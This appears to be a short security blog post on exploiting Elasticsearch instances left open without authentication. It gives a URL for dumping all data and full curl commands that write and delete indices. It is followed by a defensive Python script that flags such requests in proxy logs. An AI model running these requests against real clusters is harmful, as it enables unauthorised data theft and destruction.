Exploiting Elastic Search Instances

hacker_might · Published in System Weakness · 2 min read · Oct 21, 2022


Elasticsearch instances that are exposed without authentication let an attacker READ, WRITE and DELETE data.

If a bug bounty hunter or penetration tester finds an open Elasticsearch instance, they can try all of the attacks below.

1. READ data:

An attacker can dump all of the data by requesting the endpoint http://redated.com:9200/_search?pretty=true

2. WRITE data:

An attacker can create new data with a simple curl request:

curl -i -s -k -X $'PUT' \
  -H $'Host: [ip]:[port]' \
  -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.9999.0 Safari/537.36' \
  -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' \
  -H $'Accept-Language: en-US,en;q=0.5' \
  -H $'Accept-Encoding: gzip, deflate' \
  -H $'Connection: close' \
  -H $'Upgrade-Insecure-Requests: 1' \
  -H $'Sec-Fetch-Dest: document' \
  -H $'Sec-Fetch-Mode: navigate' \
  -H $'Sec-Fetch-Site: none' \
  -H $'Sec-Fetch-User: ?1' \
  $'https://[ip]:[port]/[name]'

In the picture above I have created a new entry with the name test.

3. DELETE data:

An attacker can delete any data with a simple curl request:

curl -i -s -k -X $'DELETE' \
  -H $'Host: [ip]:[port]' \
  -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.9999.0 Safari/537.36' \
  -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' \
  -H $'Accept-Language: en-US,en;q=0.5' \
  -H $'Accept-Encoding: gzip, deflate' \
  -H $'Connection: close' \
  -H $'Upgrade-Insecure-Requests: 1' \
  -H $'Sec-Fetch-Dest: document' \
  -H $'Sec-Fetch-Mode: navigate' \
  -H $'Sec-Fetch-Site: none' \
  -H $'Sec-Fetch-User: ?1' \
  $'https://[ip]:[port]/[NAME]'

Impact:

An attacker can dump all of the important data, delete it, or rewrite it.
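The three abuse classes above (bulk READ via _search, WRITE via PUT/POST, DELETE via DELETE) leave a clear footprint in the access log of any reverse proxy placed in front of the cluster. The following script is an added example, not code from the original post: it assumes an nginx "combined" access log for a proxy on port 9200, a hypothetical trusted application subnet (10.0.1.0/24), and uses constructed log lines.

```python
import ipaddress
import re
from typing import Dict, List

# Constructed sample lines in nginx "combined" format, as a reverse proxy in
# front of an Elasticsearch node would write them (not real traffic).
SAMPLE_LOG = """\
10.0.1.5 - - [21/Oct/2022:10:01:02 +0000] "POST /logs-2022/_doc HTTP/1.1" 201 154 "-" "python-requests/2.28"
203.0.113.7 - - [21/Oct/2022:10:02:11 +0000] "GET /_search?pretty=true HTTP/1.1" 200 90412 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Oct/2022:10:02:40 +0000] "PUT /test HTTP/1.1" 200 71 "-" "curl/7.85.0"
203.0.113.7 - - [21/Oct/2022:10:03:05 +0000] "DELETE /logs-2022 HTTP/1.1" 200 24 "-" "curl/7.85.0"
10.0.1.5 - - [21/Oct/2022:10:04:00 +0000] "GET /logs-2022/_search?q=host:web1 HTTP/1.1" 200 3310 "-" "python-requests/2.28"
"""

# Hypothetical allow-list: only the application subnet should reach the cluster.
TRUSTED_NETS = [ipaddress.ip_network("10.0.1.0/24")]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_trusted(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_NETS)


def classify(method: str, path: str) -> str:
    """Map a request onto the READ / WRITE / DELETE classes the post describes."""
    if method == "DELETE":
        return "DELETE"
    if method in ("PUT", "POST"):
        return "WRITE"
    if method == "GET" and (path == "/" or "/_search" in path or "/_cat" in path):
        return "READ"
    return ""


def find_suspicious(log_text: str) -> List[Dict[str, str]]:
    """Return successful (2xx) READ/WRITE/DELETE requests from untrusted sources."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crashing the pipeline
        kind = classify(m["method"], m["path"])
        if kind and not is_trusted(m["ip"]) and m["status"].startswith("2"):
            findings.append({"ts": m["ts"], "ip": m["ip"], "kind": kind, "path": m["path"]})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['kind']:6} {f['path']}")
```

Only successful requests are reported; a 401 on the same paths is the expected result once authentication is enabled on the cluster.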


